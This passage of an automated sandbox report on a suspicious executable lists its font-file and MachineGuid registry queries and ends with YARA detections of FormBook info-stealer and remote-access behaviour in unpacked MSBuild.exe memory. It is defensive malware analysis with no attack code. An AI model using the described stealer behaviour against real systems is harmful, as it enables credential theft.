Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
